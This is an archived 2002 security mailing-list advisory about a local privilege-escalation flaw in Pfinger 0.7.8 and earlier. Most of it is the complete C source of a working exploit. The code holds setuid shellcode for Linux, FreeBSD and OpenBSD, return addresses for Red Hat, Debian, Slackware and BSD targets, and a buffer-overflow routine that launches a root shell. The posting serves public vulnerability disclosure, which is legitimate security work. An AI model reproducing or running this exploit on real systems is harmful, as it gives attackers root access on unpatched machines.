[EXPL] Pfinger Exploit Code Released
From: support@securiteam.com
Date: 12/20/02
- Previous message: support@securiteam.com: "[EXPL] Exploit for Sendmail Local Root Vulnerability (FreeBSD, -d)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 20 Dec 2002 14:05:38 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Pfinger Exploit Code Released
------------------------------------------------------------------------
SUMMARY
The Pfinger program has been found to contain a local vulnerability, that
would allow a local attacker to gain elevated privileges.
DETAILS
Vulnerable systems:
* Pfinger version 0.7.8 and prior
Exploit:
/*
* !!PRIVATE!! DON'T DISTRIBUTE !!
* L33TSecurity - confidential source
*
* Pfinger-0.7.8 <= Local Exploit
* By Dvdman@L33TSECURITY.COM
* GREETS: UPB,JDUCK
* Thanks for all the C help UPB :)
*
* L33TSecurity - confidential source
* !!PRIVATE!! DON'T DISTRIBUTE !!
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#define MAX_ARCH 8
//Linux Setuid Shellcode
char linuxshellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
//FreeBSD Setuid Shellcode
char freebsdshellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";
//OpenBsd shellcode
char openbsdshellcode[]=
"\x99" /* cdq */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp,%ebx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x3b" /* push $0x3b */
"\x58" /* pop %eax */
"\xcd\x80"; /* int $0x80 */
struct TARGET {
char *type;
char *shellcode;
unsigned long ret_addr;
int pad;
};
struct TARGET targets [] = {
{"Redhat 7.2 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Redhat 7.3 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Redhat 8.0 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Debian 3.0 -x86 shellcode", linuxshellcode, 0xbfffff96,88},
{"Slackware 8.0 -x86 shellcode",linuxshellcode, 0xbfffff96,88},
{"Freebsd 4.6-RELEASE -x86 shellcode",freebsdshellcode,0xbfbffe43,88},
{"Freebsd 4.7-RC -x6 shellcode",freebsdshellcode,0xbfbffe43,88},
{"OpenBsd 3.1 -x86 shellcode",openbsdshellcode,0xdfbfdb8e,88},
{NULL, NULL, 0}
};
void ussage (char *argv);
int main(int argc, char **argv) {
char buffer[2000];
int x,i,blah;
int target;
int arch;
char *ptr;
long *longptr;
char shell[512];
if ((argc < 2))
ussage(argv[0]);
target = atoi(argv[1]);
// Building the Buffer
bzero(&buffer, sizeof(buffer));
memset(buffer,'A',targets[target].pad); //size of info
memset(buffer+strlen(buffer),'B',4);
memset(buffer+strlen(buffer),'C',4);
memset(buffer+strlen(buffer),'D',4);
memset(buffer+strlen(buffer),'E',4);
*(unsigned long *)(buffer+strlen(buffer))=targets[target].ret_addr;
//return address
memcpy(buffer+strlen(buffer),"\xC4\xC3\xC2\xC1\x45\x53\x80\x80",9); //sets
ARGC>0x7FFFFFFF
//setting shellcode to ENVSPACE
memset(shell,0x90,100);
memcpy(&shell[100-strlen(targets[target].shellcode)],targets[target].shellcode,strlen(targets[target].shellcode));
memcpy(shell,"SHELLCODE=",10);
putenv(shell);
execl("./finger", "finger", buffer, NULL);
}
void list_targets () {
int i;
for (i=0; targets[i].type != NULL; i++) {
fprintf (stderr, "%d) - %s\n", i, targets[i].type);
}
}
void ussage (char *argv) {
printf ("%s - pfinger local root, user, whatever exploit\n",
argv);
printf ("written by dvdman\n\n");
printf ("Ussage %s <target type> \ntargets avalible:\n\n");
list_targets ();
exit(0);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:Dvdman@L33TSECURITY.COM>
Dvdman.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[NEWS] Microsoft Hotmail Cross-Site Scripting (XSS) Flaws"
- Previous message: support@securiteam.com: "[EXPL] Exploit for Sendmail Local Root Vulnerability (FreeBSD, -d)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
